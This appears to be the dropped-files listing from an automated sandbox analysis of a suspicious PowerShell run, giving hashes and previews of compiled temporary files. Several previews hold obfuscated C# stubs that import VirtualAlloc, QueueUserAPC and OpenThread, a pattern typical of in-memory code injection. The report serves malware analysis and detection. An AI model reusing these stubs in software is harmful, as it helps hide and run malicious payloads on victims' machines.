                  Preview: L....k.a.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP.................hb..Hk......N..........4.......C:\Users\user\AppData\Local\Temp\RES4D3C.tmp.-.<...................'...Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...f.y.r.i.o.f.h.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                  C:\Users\user\AppData\Local\Temp\RES522D.tmp
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                  Category:dropped
                  Size (bytes):1332
                  Entropy (8bit):4.001046525520606
                  Encrypted:false
                  SSDEEP:24:HfzW91gNsXhHUjhKfmNwI+ycuZhN+GakSxXPNnq92d:nNsx0NKfmm1ulfa3Dq9G
                  MD5:213F99044F3A0C6DC54076D987A4F6D7
                  SHA1:0DBF8D16738EC5D6F0C2C6E1FD4D127E0282F27D
                  SHA-256:ADEDCAAD84CCDE5005ABD9382054A0F3E86450B00548EFD614C0C38883398BE7
                  SHA-512:0369AFB7D915828547BBAAD58E466330178B0C467703A53DA3DE019C71E1D5F9A5D1AD86908C5F0BCBD72A3C027A65C8D7418471540D0C069B451E002EA2B25A
                  Malicious:false
                  Reputation:unknown
                  Preview: L....k.a.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP................t.."k.lL.~.5I)...........4.......C:\Users\user\AppData\Local\Temp\RES522D.tmp.-.<...................'...Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.y.c.r.j.y.0.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0eawyjup.aqv.psm1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:unknown
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mb5zdlfp.z1g.ps1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:unknown
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ps3slfo1.dmj.psm1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:unknown
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sopdgebh.ooj.ps1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:unknown
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tjdcwq0i.u43.ps1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:unknown
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ulyjupso.1ye.ps1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:unknown
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvtk34pq.xbg.psm1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:unknown
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yelyat4t.ngd.psm1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:unknown
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\babtdr3v\CSC990A060DA8974A64BF3BB68C9993246.TMP
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):652
                  Entropy (8bit):3.0959304654205595
                  Encrypted:false
                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grytiak7Ynqq0jPN5Dlq5J:+RI+ycuZhNKakSSPNnqX
                  MD5:F2B419733048427E659D49453C92AEC6
                  SHA1:E8D1E4AB769EE0FDB703C7EBCBD907A59DAF012A
                  SHA-256:884CA4ECD737071D2660C02E80625E10D698560A51BAA482CBFAF0CC2E56111C
                  SHA-512:5610F3E33FEA8C39723A00CA9C6A8054387B33978FE99C1304C686ED97C092D9294E9B20C4C5F8A81419C82C21C68629BFD8FC69F1D09E32EBE5C844943D75C6
                  Malicious:false
                  Reputation:unknown
                  Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.a.b.t.d.r.3.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.a.b.t.d.r.3.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                  C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.0.cs
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text
                  Category:dropped
                  Size (bytes):394
                  Entropy (8bit):4.954749753951787
                  Encrypted:false
                  SSDEEP:6:V/DsYLDS81zuJqvFMmMRSRa+eNMjSSRrA3/MLqevVSRN9HRRcMzy:V/DTLDfuKFMM9eg5rmMOe8nRRcQy
                  MD5:4F00714F1C09E141DB020803EA09579D
                  SHA1:D7980DF2EB35C87A8B0970CACD97DB01F3AF3053
                  SHA-256:3849E6268E834D1AE7C9D9C9A8073383600D6E3B16FCF19D4EDA5AEFD3AB702C
                  SHA-512:27A50F4C4E088993854043C472B93BB3E4D4B49942349A2A320DECD7E1F4F50FDF55C0ADAC1929626767E670B6DF94EE020CC8794D70C11CDC11D58043EF14A4
                  Malicious:false
                  Reputation:unknown
                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class uai. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint vjsthgo,uint ssavaddinvx);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr gexlvnsp,uint sjhv,uint hya,uint gdlnrobpny);.. }..}.
                  C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.212350408166197
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fr0E10zxs7+AEszIWXp+N23fr0EP:p37Lvkmb6KHjtqWZE8jtP
                  MD5:B57390EFD9A17D0667B42DAE130BAD7B
                  SHA1:914464276843620AF2EE7F79FAC4F9183CEC863A
                  SHA-256:B61ABF43F029CE13A9CE70299C0E8DFC7B4F05DB537DBE6776C6DA3173F1EC3E
                  SHA-512:79E08B16F66B426A86412172127C2B74EE4C2F7A79B5A82A7485F2D363CEE8DD2B1C62C7C5E11EB1BBAD4E1218DA7380A3C53CAE2958B7A03CB9C6184E836A84
                  Malicious:false
                  Reputation:unknown
                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.0.cs"
                  C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.dll
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3584
                  Entropy (8bit):2.6011498201789007
                  Encrypted:false
                  SSDEEP:24:etGSt/W2dg85xsF2uhyjidWJHiXE4tkZf2B7+WI+ycuZhNKakSSPNnq:6gkb5xs0cWQXEvJ2dl1ulKa3+q
                  MD5:A48B3CC2357B538B3E2841EABC8B83AB
                  SHA1:9004FC5DD88300F1EEB548EC17E832C954622DC5
                  SHA-256:E49DFBEB8E362C8D62A44442104B37CEA5219872711E76C1D165A218C4182B9F
                  SHA-512:7F3A70FEE41B4D3F3CD07E746A09EDD33BCE55624967BAC716697DC425D9BF3B95CD683EA3CA28118C61112876F35C286D33C725E40FB1D2A4FE023A902F2916
                  Malicious:false
                  Reputation:unknown
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.a...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..X.............................................................(....*BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ H............ P.....P ......].........c.....k.....w.....................]. ...]...!.].%...].......*.....3.-.....6.......H.......P...........
                  C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.out
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):869
                  Entropy (8bit):5.316649243457035
                  Encrypted:false
                  SSDEEP:24:KBId3ka6KHRE8IKaM5DqBVKVrdFAMBJTH:Ukka6ARE8IKxDcVKdBJj
                  MD5:00743D41B51FEF388D39F06B92DB3E6E
                  SHA1:6BE45F778056018D1D0E9C15977B00FB07DA52A3
                  SHA-256:8AC0D49823018E4746E7FD3EC3460213498D42FD728196CA3091A27A4F8CF650
                  SHA-512:198DA3B292A4609E69084767F2745B734E1ED7EA2721316ECF622B1C31F4A0341E0A389A21412B03D105C91661DA7C0CA6FDAA9D10A11FB96C2CDE15576A339B
                  Malicious:false
                  Reputation:unknown
                  Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                  C:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):652
                  Entropy (8bit):3.113459562599666
                  Encrypted:false
                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryNak7YnqqBPN5Dlq5J:+RI+ycuZhNPakSBPNnqX
                  MD5:44CA36F38C4EC884B315332E829C76EB
                  SHA1:62EC19DE194D662A05E3AE75FE92938C648AE8D3
                  SHA-256:8A522BD8F647557BA34BAC575E91FBB6BE520C8C7565F2A23892F218A2D0FAF0
                  SHA-512:4CB71671A89E93E3AACC0637EB256E94A21ECEF4E72A31B54D2D586F798A24965358277C719716B8789665ECD565EF3860E718D25F6F049B178B78A7C18C1704
                  Malicious:false
                  Reputation:unknown
                  Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.u.t.k.2.h.x.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.u.t.k.2.h.x.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                  C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.0.cs
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text
                  Category:dropped
                  Size (bytes):404
                  Entropy (8bit):5.001750205738985
                  Encrypted:false
                  SSDEEP:6:V/DsYLDS81zuJMQGMRSR7a1kqcmYWSRa+rVSSRnA/fepw6V2XeYy:V/DTLDfuQabYN9rV5nA/2+6V+zy
                  MD5:E67A79EEB8705BEA96347DF090918E43
                  SHA1:95FF21FB152D1292B6DCDD128421D4EC938E2D48
                  SHA-256:D808E7944F6D224E6207EAD29CB1B7DD234016FC9C0AA7B7208FC7D6233E4CD8
                  SHA-512:9F3EAD7E7320BB8D1BD336FF39A08FF2554240DD71A9C2931D8BB849B82FAF2FE14CA5222E5F3D9DC9F4897C9B4AF3AB9D05CA77924C7B3C38107A83CA85E51B
                  Malicious:false
                  Reputation:unknown
                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class lguxor. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr lsfjmn,IntPtr xxqh,IntPtr xyrmxbtxwnl);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint mekkcqcdoju,uint nau,IntPtr tamno);.. }..}.
                  C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.289174393999176
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fRWOazxs7+AEszIWXp+N23fRWOUAn:p37Lvkmb6KHJWOaWZE8JWOUA
                  MD5:25E68EBCF8ABE19D522B9F7CF80D66DD
                  SHA1:BBAD341F9942D8416C658DEA757326B22A2353E1
                  SHA-256:0BB6C4EF56D5EB208979C24B6CDA400F499A96CA55C2A0447E0708AC9DEFA18E
                  SHA-512:D2B215787BB43BB007938016C3207BFAC0DC57CABA4A53AA61FF9939094E75FB4338186DF4E1C08A1561EEC2E9568909995109248221406B173A150335D0AC29
                  Malicious:false
                  Reputation:unknown
                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.0.cs"
                  C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.dll
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3584
                  Entropy (8bit):2.6159985439500653
                  Encrypted:false
                  SSDEEP:24:etGSV8OmU0t3lm85z7ntQW6gfgnG4laUtkZfTB5kVUWI+ycuZhNPakSBPNnq:6bXQ3r5uDarJTM31ulPa3zq
                  MD5:804B237C83038B30513C9C255C653BEC
                  SHA1:9A6923E88746B58B8E32974B9A227398D1DC6700
                  SHA-256:AB81E8646B4E6F5EBB2D5A34AC7719565568E0A9D2AB8DFAA4EBEF5B42F7EA28
                  SHA-512:0F5F5D4B3BB3B48EBD06317CFE16BE7E587A29507224A97ED6021AE0813BB123737C35D087C3D7617F0817E2B2E1063287FAF0745CA44E9256D02D48F7241CAA
                  Malicious:false
                  Reputation:unknown
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.a...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ F............ Y.....P ......d.........j.....q.....v.....................d. ...d...!.d.%...d.......*.....3.1.....9.......F.......Y...........
                  C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.out
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):869
                  Entropy (8bit):5.334556517758157
                  Encrypted:false
                  SSDEEP:24:KBId3ka6KHIO7E8IOmKaM5DqBVKVrdFAMBJTH:Ukka6AnE8qKxDcVKdBJj
                  MD5:814C825E0BE39172F802F03601650CC1
                  SHA1:97115EEDA96D164B2639262EEFEB1CF59582283E
                  SHA-256:2E20688AAE2CB582B169817FFF902F077232AE2BBC6586513738D3883040F536
                  SHA-512:A8E015FC4D23AE2187DBD6F62EF3798DA31A44652ADC59638BA4AC5E745FEF0A5BD916747F89E5C1917FFBCFE8818D2B7FE7405B5B6DDFE3EFB949673A64C4AA
                  Malicious:false
                  Reputation:unknown
                  Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                  C:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):652
                  Entropy (8bit):3.0888774581437173
                  Encrypted:false
                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygqlGak7Ynqq7qlXPN5Dlq5J:+RI+ycuZhNKqYakS7qNPNnqX
                  MD5:E30068629991486BEBAD00E41588FE4E
                  SHA1:C50A0802C62B9F012585B0961E76CEC88C4E420F
                  SHA-256:76B62C96DDA2B373007D007B1828C32730780BB1AA65CE4488A58F7266FE11A8
                  SHA-512:A5C41F85DB2E619696C94D96B6DA5F9D8ECD2B8D55F65127CA1876BDD28E9579A877A8DB88319ADE8A23B56D9E8C7AF0C8DC3F31C6D5114D37630122D1191233
                  Malicious:false
                  Reputation:unknown
                  Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...f.y.r.i.o.f.h.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...f.y.r.i.o.f.h.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                  C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.0.cs
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text
                  Category:dropped
                  Size (bytes):404
                  Entropy (8bit):5.001750205738985
                  Encrypted:false
                  SSDEEP:6:V/DsYLDS81zuJMQGMRSR7a1kqcmYWSRa+rVSSRnA/fepw6V2XeYy:V/DTLDfuQabYN9rV5nA/2+6V+zy
                  MD5:E67A79EEB8705BEA96347DF090918E43
                  SHA1:95FF21FB152D1292B6DCDD128421D4EC938E2D48
                  SHA-256:D808E7944F6D224E6207EAD29CB1B7DD234016FC9C0AA7B7208FC7D6233E4CD8
                  SHA-512:9F3EAD7E7320BB8D1BD336FF39A08FF2554240DD71A9C2931D8BB849B82FAF2FE14CA5222E5F3D9DC9F4897C9B4AF3AB9D05CA77924C7B3C38107A83CA85E51B
                  Malicious:false
                  Reputation:unknown
                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class lguxor. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr lsfjmn,IntPtr xxqh,IntPtr xyrmxbtxwnl);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint mekkcqcdoju,uint nau,IntPtr tamno);.. }..}.
                  C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.256015749761079
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fT8Nzxs7+AEszIWXp+N23fT8on:p37Lvkmb6KH4WZE81n
                  MD5:BB998B048515845A9D1E61C40342B88F
                  SHA1:A74E0B7628404AB735767F9DF0F27378EF547E57
                  SHA-256:F0740A2E540BD7CCB2BB711116F86EA9964878255E7D0283BF16DE9D2568B733
                  SHA-512:B7AC73A35C2FB369025F484C06B87D3CAE601E2B9BE4B680BE204105678673DFB5F8DA2FB6AB14D273DA5D702214D0F220263A3A150465FBF58C77A5FD2C97BF
                  Malicious:false
                  Reputation:unknown
